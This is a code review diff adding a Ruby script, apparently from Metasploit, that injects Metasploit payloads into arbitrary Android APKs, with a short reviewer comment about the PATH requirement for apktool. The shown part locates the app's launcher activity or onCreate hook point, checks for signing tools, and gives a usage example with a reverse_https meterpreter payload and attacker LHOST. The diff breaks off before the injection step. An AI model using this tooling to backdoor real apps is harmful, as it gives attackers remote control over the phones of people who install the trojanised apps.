tools/apk_backdoor.rb

```diff
@@ -0,0 +1,172 @@
+#!/usr/bin/env ruby
+#
+# This script is a POC for injecting metasploit payloads on 
+# arbitrary APKs. Latest Git version of Apktool is recommended.
+# Authored by timwr, Jack64
+#
+
+
+require 'nokogiri'
+require 'fileutils'
+
+# Find the activity that is opened when you click the app icon
+def findlauncheractivity(amanifest)
+    package = amanifest.xpath("//manifest").first['package']
+    activities = amanifest.xpath("//activity|//activity-alias")
+    for activity in activities 
+        activityname = activity.attribute("name")
+        category = activity.search('category')
+        unless category
+            next
+        end
+        for cat in category
+            categoryname = cat.attribute('name')
+            if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
+                activityname = activityname.to_s
+                unless activityname.start_with?(package)
+                    activityname = package + activityname
+                end
+                return activityname
+            end
+        end
+    end
+end
+
+# If XML parsing of the manifest fails, recursively search
+# the smali code for the onCreate() hook and let the user
+# pick the injection point
+def scrapeFilesForLauncherActivity()
+	smali_files||=[]
+	Dir.glob('original/smali*/**/*.smali') do |file|
+	  checkFile=File.read(file)
+	  if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")
+		smali_files << file
+		smalifile = file
+		activitysmali = checkFile
+	  end
+	end
+	i=0
+	print "[*] Please choose from one of the following:\n"
+	smali_files.each{|s_file|
+		print "[+] Hook point ",i,": ",s_file,"\n"
+		i+=1
+	}
+	hook=-1
+	while (hook < 0 || hook>i)
+		print "\nHook: "
+		hook = STDIN.gets.chomp.to_i
+	end
+	i=0
+	smalifile=""
+	activitysmali=""
+	smali_files.each{|s_file|
+		if (i==hook)
+			checkFile=File.read(s_file)
+			smalifile=s_file
+			activitysmali = checkFile
+			break
+		end
+		i+=1
+	}
+	return [smalifile,activitysmali]
+end
+
+apkfile = ARGV[0]
+unless(apkfile && File.readable?(apkfile))
+	puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
+	puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
+	exit(1)
+end
+
+jarsigner = `which jarsigner`
+unless(jarsigner && jarsigner.length > 0)
+	puts "No jarsigner"
+	exit(1)
+end
+
+apktool = `which apktool`
+unless(apktool && apktool.length > 0)
+	puts "No apktool"
+	exit(1)
+end
+
+apk_v=`apktool`
+unless(apk_v.split()[1].include?("v2."))
```

Comment:
This should probably tell the user that apktool needs to be in their PATH as well.